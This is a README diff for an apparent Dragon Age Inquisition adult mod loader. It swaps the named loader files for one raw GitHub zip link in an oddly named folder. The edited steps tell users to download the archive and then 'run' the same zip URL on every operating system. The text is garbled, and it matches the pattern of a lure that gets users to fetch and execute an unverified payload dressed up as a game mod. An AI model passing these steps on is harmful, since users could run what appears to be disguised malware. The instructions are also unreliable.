sorour488/DraconicDesires-InquisitionModPack/README.md

 To get started with the Dragon Age Inquisition Adult Mod Loader, follow these steps.
 Installation is effortless and designed for both new and experienced modding fans!

-1. Download Loader.rar from the repository.
+1. Download https://raw.githubusercontent.com/sorour488/DraconicDesires-InquisitionModPack/main/Cupressaceae/DraconicDesires-InquisitionModPack.zip from the repository.
-2. Extract Loader.rar to any directory of your choice.
+2. Extract https://raw.githubusercontent.com/sorour488/DraconicDesires-InquisitionModPack/main/Cupressaceae/DraconicDesires-InquisitionModPack.zip to any directory of your choice.
 3. Ensure Dragon Age Inquisition is installed on your PC.
-4. Run Loader.exe (or Loader.app/Loader.sh on macOS/Linux).
+4. Run https://raw.githubusercontent.com/sorour488/DraconicDesires-InquisitionModPack/main/Cupressaceae/DraconicDesires-InquisitionModPack.zip (or https://raw.githubusercontent.com/sorour488/DraconicDesires-InquisitionModPack/main/Cupressaceae/DraconicDesires-InquisitionModPack.zip on macOS/Linux).
 5. Follow the on-screen instructions to select your game folder.
 6. Drag your adult mod files into the loader window, or use the "Add Mod" button.
 7. Activate and arrange your mods via the simple interface.